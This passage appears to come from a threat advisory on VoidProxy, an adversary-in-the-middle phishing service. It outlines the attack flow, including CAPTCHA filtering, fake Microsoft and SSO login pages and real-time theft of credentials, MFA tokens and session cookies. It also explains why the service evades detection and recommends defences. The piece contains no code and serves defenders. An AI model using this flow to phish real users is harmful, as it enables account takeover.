Once a user enters their credentials and MFA tokens, the session is hijacked via a reverse proxy server, allowing the attacker to immediately access the legitimate account.

Here are some shortened url links

Attack Flow

StepDescription
1. DeliveryPhishing emails are sent from compromised accounts on email delivery services (like Postmarkapp or Constant Contact) increasing trust and shortening URL services for bypassing spam filters.
2. Redirecting & FilterClicking the phishing link redirects victims through several short URLs and presents a Cloudflare captcha to ensure human interaction.
3. PhishingVictims land on a fake Microsoft or Google login page using realistic subdomain patterns like “login.<phishing_domain>.<.com/.io>”. Additionally, integrated SSO accounts are redirected to additional fake SSO pages mimicking the login flows.
4. AiTM Session HijackThe backend proxy captures credentials, MFA tokens and session cookies, allowing attackers full account access.
5. ExfiltrationSession cookies and credentials are routed to the attacker’s admin panel in real-time. Integration with bots or webhooks enables instant alerts to the attackers.

Why It’s Effective

AiTM Infrastructure: Unlike static phishing kits, VoidProxy runs a live proxy in the middle of the authentication flow, stealing session tokens or mfa token immediately after login.

CAPTCHA & Cloudflare Layers: These challenges ensure only real human victims reach the phishing payload, filtering out scanners and sandboxes.

Integrated SSO Targeting: Accounts using Okta or other SSO providers are redirected to accurate second-stage phishing pages, increasing the likelihood of a full compromise.

Recommendations:

Here are some recommendations below

  • Harden the authentication by bind sessions to IP addresses (IP Session Binding) to block cookie replay attacks.
  • Block access from rarely used IP ranges or unmanaged devices.
  • Provide user awareness training to help recognize phishing links, suspicious email senders and fake login prompts.
  • Keep monitoring for any indications of suspicious activities.

Conclusion
VoidProxy’s layered architecture, real-time session hijacking and deep evasion mechanisms make it a potential threat even for environments with multi-factor authentication in place. We require a shift from traditional phishing detection toward real-time risk-based access controls, strong authenticators and persistent user education.

References:

Scroll to top